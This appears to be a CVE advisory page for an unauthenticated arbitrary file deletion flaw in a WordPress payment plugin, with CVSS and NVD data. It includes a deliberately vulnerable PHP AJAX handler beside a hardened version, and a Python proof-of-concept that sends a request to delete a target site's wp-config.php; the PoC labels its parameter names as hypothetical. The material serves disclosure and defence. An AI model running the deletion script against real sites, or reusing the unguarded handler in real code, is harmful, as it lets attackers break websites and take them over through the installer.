Security Vulnerability Report
CVE-2025-14829 CVSS 9.1 CRITICAL

CVE-2025-14829

Published: 2026-01-13 06:15:49
Last Modified: 2026-04-15 00:35:42

Description

The E-xact | Hosted Payment | WordPress plugin through 2.0 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. The impact goes beyond loss of the deleted file: removing wp-config.php, for example, disconnects WordPress from its database and causes the next request to land on the installer, which is why the vector below rates integrity and availability impact as High even though no data is read.

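The bug class in the description, as an added illustration that is not the E-xact plugin's own code (the page does not show the plugin's handler, parameter names or directory layout, so every name below is assumed): an admin-ajax handler reachable without login that unlinks whatever path the request supplies, beside a hardened form that drops the nopriv hook, requires a nonce and a capability, reduces the input to a bare filename, and only deletes after realpath() confirms the target sits inside one plugin-owned directory.

```php
<?php
// Added illustration for the CVE-2025-14829 bug class. Not the plugin's code;
// the action names, the "file_path"/"file" parameters and the
// "example-plugin" directory are assumptions made for this example.

// --- Vulnerable pattern: no auth, no nonce, path used verbatim --------------
add_action( 'wp_ajax_nopriv_example_delete_file', 'example_delete_file_vulnerable' );
add_action( 'wp_ajax_example_delete_file', 'example_delete_file_vulnerable' );

function example_delete_file_vulnerable() {
    // "../../wp-config.php" or "/etc/cron.d/job" is passed straight to unlink().
    $file = wp_unslash( $_POST['file_path'] ?? '' );
    if ( $file !== '' && file_exists( $file ) ) {
        unlink( $file );
    }
    wp_send_json_success();
}

// --- Hardened form ----------------------------------------------------------
// Registered for logged-in users only: admin-ajax answers "0" to everyone else.
add_action( 'wp_ajax_example_delete_file_safe', 'example_delete_file_safe' );

function example_delete_file_safe() {
    // CSRF protection: dies unless a valid nonce for this action is present.
    check_ajax_referer( 'example_delete_file', 'nonce' );

    // Authorization: being logged in is not enough for a destructive action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Accept a bare filename only; basename() drops any directory component
    // and sanitize_file_name() strips characters that have no place in one.
    $name = sanitize_file_name( basename( wp_unslash( $_POST['file'] ?? '' ) ) );
    if ( $name === '' ) {
        wp_send_json_error( 'bad filename', 400 );
    }

    // Confine deletion to a single directory owned by this plugin.
    $upload   = wp_upload_dir();
    $base_dir = realpath( trailingslashit( $upload['basedir'] ) . 'example-plugin' );
    if ( $base_dir === false ) {
        wp_send_json_error( 'not found', 404 );
    }

    // Resolve symlinks and ".." first, then require the result to be a
    // regular file strictly below $base_dir (the separator prevents
    // "example-plugin-evil" from matching the prefix "example-plugin").
    $target = realpath( $base_dir . DIRECTORY_SEPARATOR . $name );
    if ( $target === false
        || strpos( $target, $base_dir . DIRECTORY_SEPARATOR ) !== 0
        || ! is_file( $target ) ) {
        wp_send_json_error( 'not found', 404 );
    }

    // Core helper (WP >= 4.9.7) re-checks containment before unlinking.
    if ( ! wp_delete_file_from_directory( $target, $base_dir ) ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success( array( 'deleted' => $name ) );
}
```

The order of checks matters: the nonce and capability tests run before any filesystem access, and the containment test compares resolved paths rather than the raw string, so an input that hides traversal behind a symlink or URL-encoding is caught at the realpath() step rather than by a pattern blacklist.
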
CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is published for this entry (NVD vulnStatus: Deferred). Affected versions per the description:

E-xact Hosted Payment WordPress plugin <= 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14829 PoC - WordPress E-xact Hosted Payment Plugin Arbitrary File Deletion
# This PoC demonstrates how an unauthenticated attacker can delete arbitrary files.
#
# NOTE: the AJAX action name, the "file_path" parameter and the plugin directory
# slug used below are hypothetical placeholders, not taken from the plugin.
# The vulnerable endpoint is documented in the WPScan reference for this CVE.

TARGET_URL = "http://target-wordpress-site.com"

# Target file to delete (can be any file on the server)
FILE_TO_DELETE = "wp-config.php"


def delete_arbitrary_file(target_url, file_path):
    """
    Delete arbitrary file via vulnerable E-xact Hosted Payment plugin
    """
    # WordPress AJAX endpoint; wp_ajax_nopriv_* handlers need no login
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Construct malicious request
    # The plugin accepts file path without proper validation
    data = {
        "action": "exact_delete_file",  # Hypothetical action name
        "file_path": file_path,  # Arbitrary file path (hypothetical parameter name)
    }

    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        # admin-ajax.php answers HTTP 200 with body "0" when no handler is
        # registered for the action, so 200 alone does not mean the deletion ran.
        if response.status_code == 200 and response.text.strip() == "0":
            print("[-] admin-ajax returned '0': no handler registered for this action")
            return False
        if response.status_code == 200:
            print(f"[+] File deletion request sent: {file_path}")
            print(f"[*] Response: {response.text}")
            return True
        print(f"[-] Request failed with status: {response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def check_plugin_installed(target_url):
    """
    Check if E-xact Hosted Payment plugin is installed
    """
    # Plugin directory slug is assumed; readme.txt is world-readable on most installs
    plugin_url = f"{target_url.rstrip('/')}/wp-content/plugins/e-xact-hosted-payment/readme.txt"
    try:
        response = requests.get(plugin_url, timeout=10)
        if response.status_code == 200 and "E-xact" in response.text:
            print("[+] E-xact Hosted Payment plugin is installed")
            return True
    except requests.exceptions.RequestException:
        pass
    print("[-] Plugin not found or target is not WordPress")
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    else:
        target_url = TARGET_URL

    print(f"[*] Target: {target_url}")
    print("[*] CVE-2025-14829 PoC - Arbitrary File Deletion\n")

    # Check if plugin is installed
    if not check_plugin_installed(target_url):
        print("[!] Exiting...")
        sys.exit(0)

    # Delete target file
    print(f"[*] Attempting to delete: {FILE_TO_DELETE}")
    delete_arbitrary_file(target_url, FILE_TO_DELETE)

References

https://wpscan.com/vulnerability/872569bc-16fb-427f-accc-147f284137cd/ (WPScan advisory, the source of this entry)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14829",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T06:15:49.310",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The E-xact | Hosted Payment | WordPress plugin through 2.0 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server."
      },
      {
        "lang": "es",
        "value": "El plugin de WordPress E-xact | Hosted Payment | hasta la versión 2.0 es vulnerable a la eliminación arbitraria de archivos debido a una validación insuficiente de la ruta de archivos. Esto permite a atacantes no autenticados eliminar archivos arbitrarios en el servidor."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/872569bc-16fb-427f-accc-147f284137cd/",
        "source": "[email protected]"
      }
    ]
  }
}